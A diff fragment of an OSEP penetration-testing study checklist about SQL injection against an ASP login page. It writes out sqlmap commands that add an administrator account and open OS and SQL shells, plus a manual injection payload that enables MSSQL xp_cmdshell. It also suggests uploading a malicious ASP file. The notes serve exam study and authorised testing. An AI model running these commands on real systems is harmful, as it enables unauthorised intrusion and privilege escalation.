OoStellarnightoO/OSEP_Notes/00 - OSEP Checklist/README.md

 sqlmap -u "http://<victim ip>/login.asp?user=a&password=a" --os-cmd="net localgroup administrators hacker /add"
 # try to get shell
 sqlmap -u "http://<victim ip>/login.asp?user=a&password=a" --os-shell
+# if above does not work, try sql shell and then enable xp_cmdshell.
+Can also consider uploading a malicious asp file to web root and execute
+sqlmap -u "http://<victim ip>/login.asp?user=a&password=a" --sql-shell

+## manual SQL Injection in BurpSuite; note you may need to use + or %20 for the whitespaces
+http://192.168.X.X/login.asp?user=test&pass=1' or 1=1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE--
 ```
+- Note if there is SQL vuln, that means there is an SQL database somewhere (most likely MSSQL)

 ### Email Phishing Vector